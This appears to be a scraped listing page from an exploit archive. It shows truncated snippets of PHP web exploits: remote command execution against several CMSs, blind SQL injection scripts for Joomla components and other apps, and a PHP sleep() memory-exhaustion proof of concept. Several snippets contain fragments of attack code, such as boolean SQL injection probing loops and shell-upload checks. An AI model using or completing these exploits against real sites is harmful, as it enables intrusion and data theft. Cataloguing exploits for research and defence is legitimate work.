MyCMS <= 0.9.8 - Remote Command Execution Exploit

No description provided by source. !/usr/bin/php -q -d shortopentag=on ? echo MyCMS = 0.9.8 Remote Command Execution Exploit by BlackHawk [email protected] http://itablackhawk.altervista.org Thanks to rgod for the php code and Marty for the Love ; if $argc3 echo Usage: php .$argv0. Host Path C...

PHPNuke 6.x Category Parameter SQL Injection Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/9630/info It has been reported that PHPNuke may prone to a SQL injection vulnerability, due to insufficient sanitization user-supplied input. The problem is reported to exist in the $category variable contained within the...

Jieqi CMS <= 1.5 - Remote Code Execution Exploit

No description provided by source. ?php printr' +---------------------------------------------------------------------------+ Jieqi cms = 1.5 remote code execution exploit by Securitylab.ir mail: [email protected] +---------------------------------------------------------------------------+ '; ...

PhpCommander <= 3.0 (upload) Remote Code Execution Exploit

No description provided by source. !/usr/bin/php -q -d shortopentag=on ? $devilteam = ::::::::: :::::::::: ::: ::: ::::::::::: ::: :+: :+: :+: :+: :+: :+: :+: +:+ +:+ +:+ +:+ +:+ +:+ +:+ ++ +:+ +++:++ ++ +:+ ++ ++ ++ ++ ++ ++ ++ ++ ++ + + + +++ + + ::::::::::: :::::::::: ::: :::: :::: :+: :+: :+:...

php53 security, bug fix and enhancement update

5.3.3-21 - add security fix for CVE-2013-4248 5.3.3-20 - add security fix for CVE-2013-4113 5.3.3-19 - add upstream reproducer for errorhandler 951075 5.3.3-18 - add security fixes for CVE-2006-7243 5.3.3-17 - reorder security patches - add security fixes for CVE-2012-2688, CVE-2012-0831,...

Family Connections CMS 2.5.02.7.1 - less.php Remote Command Execution

Family Connections CMS 2.5.02.7.1 - less.php Remote Command Execution $theme = isset$argv1 ? $argv1 : 'default'; system"clear"; if fileexists"$dir/themes/$theme/style.css" echo "\n themes/$theme/style.css already exists.\n\n"; echo "Overwrite y/n ? "; $handle = fopen "php://stdin","r"; $line =...

PHP168 V6. 01/6. 0 2 elevation of privilege and storm the local path vulnerability-vulnerability warning-the black bar safety net

PHP168 whole Station is the PHP field of the current most powerful build system, The code is all open source, can be extremely convenient for secondary development, all modules can be freely installed and removed, individual users completely free to use PHPCMS V6. 0 1 There is a serious security...

com_jembed - catid Blind SQL Injection

comjembed - catid Blind SQL Injection 1 $url = $argv1; $r = strlenfilegetcontents$url."+and+1=1--"; echo "\nExploiting:\n"; $w = strlenfilegetcontents$url."+and+1=0--"; $t = abs100-$w/$r100; echo "Username: "; for $i=1; $i $t-1 $count = $i; $i = 30; for $j = 1; $j $t-1 $laenge =...

Joomla! Component com_gsticketsystem - &#039;catid&#039; Blind SQL Injection

1 $url = $argv1; $r = strlenfilegetcontents$url."+and+1=1--"; echo "\nExploiting:\n"; $w = strlenfilegetcontents$url."+and+1=0--"; $t = abs100-$w/$r100; echo "Username: "; for $i=1; $i $t-1 $count = $i; $i = 30; for $j = 1; $j $count; $j++ for $i = 46; $i = 122; $i=$i+2 if $i == 60 $i = 98; $laen...

Jieqi CMS 1.5 - Remote Code Execution

Jieqi CMS 1.5 - Remote Code Execution test"; $str = filegetcontents$url.$cmd; if filegetcontents$shell == 'test' exit"Expoilt Success!\nView Your shell:\t$shell\n"; else exit"Exploit Failed!\n"; ? milw0rm.com 2009-05-18...

Joomla! Component com_digistore - &#039;pid&#039; Blind SQL Injection

1 $url = $argv1; $r = strlenfilegetcontents$url."+and+1=1--"; echo "\nExploiting:\n"; $w = strlenfilegetcontents$url."+and+1=0--"; $t = abs100-$w/$r100; echo "Username: "; for $i=1; $i $t-1 $count = $i; $i = 30; for $j = 1; $j $t-1 $laenge = strlen...

Joomla com_pcchess (game_id) Blind SQL Injection Exploit

Exploit for unknown platform in category web applications ======================================================== Joomla compcchess gameid Blind SQL Injection Exploit ======================================================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0...

pLink 2.07 - linkto.php Blind SQL Injection

pLink 2.07 - linkto.php Blind SQL Injection php '.$argv0.' http://www.site.com/link/linkto.php?id=128 2 Live Demo : http://www.uni-leipzig.de/fsrpowi/link/linkto.php?id=128 2 '; if $argc 1 $url = $argv1; if $argc 3 $userid = 1; else $userid = $argv2; $r = strlenfilegetcontents$url."+and+1=1/"; ec...

PHP 5.2.6 sleep() Local Memory Exhaust Exploit

No description provided by source. ?php sleep9999999; echo 'Hello World'; ? Will print hello world after 9999999 seconds... so maxexecutiontime simply dosnt work :P Why? we can find in manual:...

function sleep&#40;&#41; in all versions of PHP

There is a quite big problem with sleep function in php, The maxexecutiontime set to 60sec. in safe mode can be easy passed by using sleep funcion, for example this script: ?php sleep9999999; echo 'Hello World'; ? Will print hello world after 9999999 seconds... so maxexecutiontime simply dosnt wo...

PHP 5.2.6 sleep() Local Memory Exhaust Exploit

Exploit for multiple platform in category dos / poc ============================================== PHP 5.2.6 sleep Local Memory Exhaust Exploit ============================================== There is some kind of issue in PHP we can run out memory even on SAFEMODE script simply allocate maximum o...

PHP 5.2.6 - &#039;sleep()&#039; Local Memory Exhaust

There is some kind of issue in PHP we can run out memory even on SAFEMODE script simply allocate maximum of memory and go to sleep for, let's say 9999999 seconds. sleep pass 'maxexecutiontime' setting. Ram eater sploit ? if ! $purl = @parseurl$url die'sorry, parseurl function disabled Oo'; if !...

php526-dos.txt

Will print hello world after 9999999 seconds... so maxexecutiontime simply dosnt work :P Why? we can find in manual: "maxexecutiontime only affect the execution time of the script itself. Any time spent on activity that happens outside the execution of the script such as system calls using system...

PHP 5.2.6 - sleep() Local Memory Exhaust

PHP 5.2.6 - sleep Local Memory Exhaust There is some kind of issue in PHP we can run out memory even on SAFEMODE script simply allocate maximum of memory and go to sleep for, let's say 9999999 seconds. sleep pass 'maxexecutiontime' setting. Ram eater sploit ? if ! $purl = @parseurl$url die'sorry,...

Vortex CMS (index.php pageid) Blind SQL Injection Exploit

No description provided by source. ?php iniset"maxexecutiontime",0; printr' Vortex CMS - Blind SQL Injection Exploit Vulnerability discovered by: LidlosesAuge Exploit coded by: LidlosesAuge Greetz to: -=Player=- , Suicide, g4ms3, enco GPM, Free-Hack &n...